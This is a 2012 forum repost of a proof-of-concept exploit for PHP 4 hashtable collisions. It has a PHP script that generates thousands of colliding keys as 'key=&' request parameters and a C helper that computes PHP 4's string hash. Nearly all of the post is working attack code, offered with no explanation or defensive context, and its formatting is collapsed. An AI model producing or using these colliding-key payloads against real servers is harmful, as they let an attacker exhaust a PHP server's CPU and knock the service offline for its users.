denjacker Posted January 4, 2012 Report Posted January 4, 2012 PHP 4 Hash Collision Proof Of Concept <?PHP//// (c) Antoine Santo 2012//$tab=array("AAAA","FfAA","ABbA","FebA");for($v8=0;$v8<count($tab);$v8++){for($v7=0;$v7<count($tab);$v7++){for($v6=0;$v6<count($tab);$v6++){for($v5=0;$v5<count($tab);$v5++){for($v4=0;$v4<count($tab);$v4++){for($v3=0;$v3<count($tab);$v3++){for($v2=0;$v2<count($tab);$v2++){for($v1=0;$v1<count($tab);$v1++){ $val = exec("./calchash-php4 ".$tab[$v8].$tab[$v7].$tab[$v6].$tab[$v5].$tab[$v4].$tab[$v3].$tab[$v2].$tab[$v1]); echo $tab[$v8].$tab[$v7].$tab[$v6].$tab[$v5].$tab[$v4].$tab[$v3].$tab[$v2].$tab[$v1]."=&" ;}}}}}}}}?>/* Antoine Santo 2012 */#include <stdio.h>#include <string.h>// this will calculate a hash for a given string using PHP 4.0 hashtable implementationtypedef unsigned long ulong;typedef unsigned int uint;ulong zend_inline_hash_func(char *arKey, uint nKeyLength){ ulong $h = 5381; char *arEnd = arKey + nKeyLength; while (arKey < arEnd) { $h += ($h << 5); $h ^= (ulong) *arKey++; } return $h;}int main (int argc, char** argv){ if (argc < 2) { printf("Use: %s <string>\n", argv[0]); } else { printf("%lu\n", zend_inline_hash_func(argv[1], strlen(argv[1]))); } return 0;}http://packetstormsecurity.org/files/108352 Quote
